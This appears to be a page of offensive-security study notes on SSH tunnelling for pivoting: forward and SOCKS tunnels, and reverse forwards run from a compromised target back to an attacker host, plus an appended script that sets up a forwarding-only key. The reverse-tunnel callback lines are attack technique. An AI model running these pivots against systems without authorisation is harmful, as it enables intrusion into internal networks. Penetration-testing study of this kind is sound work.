LSWSec - Offensive
SSH tunneling/port forwarding

  • forward connections

    • a forward ssh tunnel is created from our attacking box when we have ssh access (a password or key) to the target

    • most commonly done against linux servers that have ssh active and open

    • port forwarding

      • ssh -L 8000:<ip2>:80 user@<ip1> -fN

      • opens port 8000 on the attacking box (bound to 127.0.0.1 by default); anything sent to it is carried over the ssh session to ip1, which connects on to ip2:80

      • best for when there's a website on ip2 that is only reachable from ip1 and you have ssh access to ip1

      • -f backgrounds ssh once it has authenticated and -N tells it not to run a remote command, so the tunnel stays up without a shell

      • best practice to use a high local port number: ports below 1024 need root, and a high port is less likely to clash with something already listening locally

    • proxies

      • made with -D <port>, which starts a SOCKS proxy on the attacking box instead of mapping a single port

      • ssh -D <port> user@<ip> -fN

      • point proxychains or the browser at 127.0.0.1:<port> and every connection through it leaves from ip

  • Reverse connections

    • preferable if you have a shell on the server but not ssh access to it (the target still needs an ssh client)

    • riskier, as the target has to connect back to an ssh server on the attacking machine and a private key ends up on the target

    • before making a connection there are a few steps to take first, all on the attacking machine

      • first create a new, dedicated set of ssh keys > ssh-keygen (don't reuse your normal key, since the private half will be copied to the target)

      • copy the contents of the public key (the file ending in .pub) and then edit ~/.ssh/authorized_keys

        • may need to create ~/.ssh (chmod 700) and the authorized_keys file (chmod 600); sshd ignores the file if the permissions are looser

      • in the file, on a single line, paste

        • command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty

        • then a space and the public key on the same line

      • this makes sure the key can only be used for port forwarding and disallows the ability to gain a shell; the command= part is what actually blocks command execution (no-pty alone only blocks an interactive terminal), so if the private key is recovered from the target it can still be used to open forwards through our box but not to log in, which is why the line should be removed once the pivot is done

    • once the first few steps are done, make sure the ssh service has started on the attacking machine (e.g. sudo systemctl start ssh) and copy the private key to the target (chmod 600 it there, or ssh refuses to use it)

    • now we can connect back from the target with a reverse port forward using the following command

      • ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

      • this opens LOCAL_PORT on the attacking machine (loopback only, unless GatewayPorts is enabled in its sshd config); connecting to it there reaches TARGET_IP:TARGET_PORT from the target's side of the network

    • in newer versions of the ssh client (OpenSSH 7.6 and later), it is possible to create a reverse SOCKS proxy with ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN, which gives the attacking machine a proxy on 127.0.0.1:1337 into the target's network

  • to kill any of these connections type "ps aux | grep ssh" into the terminal, find the pid of the backgrounded tunnel (its command line shows the -L, -R or -D option), then run "kill pid" (sudo is only needed if the tunnel belongs to another user)
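The key-restriction steps for the reverse connection above, as an added shell example that is not part of these notes: it builds the restricted authorized_keys line from a .pub file, installs it on the attacking machine with the permissions sshd expects, checks those permissions, and removes the entry again afterwards. The key-file paths, the optional directory argument and any sample key are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: prepare the port-forwarding-only
# key entry on the ATTACKING machine. Paths (tunnel_key, $HOME/.ssh) and any
# sample key are assumptions for illustration.
set -eu

# Options from the notes: a forced command (so any login attempt only prints a
# message), no agent or X11 forwarding and no PTY. Port forwarding stays allowed.
RESTRICT_OPTS="command=\"echo 'This account can only be used for port forwarding'\",no-agent-forwarding,no-x11-forwarding,no-pty"

# Generate the dedicated ed25519 key pair with no passphrase, so the -fN ssh
# on the target can use it unattended. Prints the path of the .pub file; the
# private half is what gets copied to the target.
gen_tunnel_key() {
    keyfile=${1:-$HOME/.ssh/tunnel_key}
    ssh-keygen -q -t ed25519 -N '' -C 'reverse-tunnel-only' -f "$keyfile"
    printf '%s\n' "$keyfile.pub"
}

# Print the authorized_keys line: options, one space, then the public key exactly
# as ssh-keygen wrote it. Refuses anything that is not an OpenSSH public-key line
# (a private key pasted by mistake would never authenticate).
restricted_line() {
    pubkey_file=$1
    if ! head -n 1 "$pubkey_file" |
        grep -Eq '^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/]+=*( |$)'; then
        echo "not an OpenSSH public key: $pubkey_file" >&2
        return 1
    fi
    printf '%s %s\n' "$RESTRICT_OPTS" "$(head -n 1 "$pubkey_file")"
}

# Append the restricted line to SSH_DIR/authorized_keys (default ~/.ssh), creating
# directory and file with the modes sshd's StrictModes needs (700 and 600).
# A key whose blob is already in the file is not added a second time.
install_restricted_key() {
    pubkey_file=$1
    ssh_dir=${2:-$HOME/.ssh}
    auth=$ssh_dir/authorized_keys
    line=$(restricted_line "$pubkey_file")
    key_blob=$(head -n 1 "$pubkey_file" | awk '{print $2}')
    mkdir -p "$ssh_dir"
    chmod 700 "$ssh_dir"
    touch "$auth"
    chmod 600 "$auth"
    if grep -Fq -- "$key_blob" "$auth"; then
        echo "key already present in $auth" >&2
    else
        printf '%s\n' "$line" >> "$auth"
    fi
}

# Return 0 only if SSH_DIR is mode 700 and its authorized_keys is mode 600.
# With the default StrictModes sshd silently ignores the file otherwise, and
# the reverse tunnel then fails with a plain "Permission denied (publickey)".
check_perms() {
    ssh_dir=${1:-$HOME/.ssh}
    [ -n "$(find "$ssh_dir" -maxdepth 0 -type d -perm 700 2>/dev/null)" ] &&
        [ -n "$(find "$ssh_dir/authorized_keys" -maxdepth 0 -type f -perm 600 2>/dev/null)" ]
}

# Remove the entry again once the pivot is over: the key still permits
# forwards, so it must not outlive the engagement. Returns 0 if a line was removed.
remove_restricted_key() {
    pubkey_file=$1
    ssh_dir=${2:-$HOME/.ssh}
    auth=$ssh_dir/authorized_keys
    key_blob=$(head -n 1 "$pubkey_file" | awk '{print $2}')
    grep -Fq -- "$key_blob" "$auth" || return 1
    grep -Fv -- "$key_blob" "$auth" > "$auth.tmp" || true
    mv "$auth.tmp" "$auth"
    chmod 600 "$auth"
}
```

Typical order on the attacking box is `install_restricted_key "$(gen_tunnel_key)"` followed by `check_perms`; then copy the private `tunnel_key` file to the target and run the `ssh -R ... -i KEYFILE -fN` line from the notes there. `restricted_line` on its own prints the exact text if you prefer to paste it by hand, and `remove_restricted_key` takes the entry out again when the tunnel is no longer needed.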


Last updated 5 months ago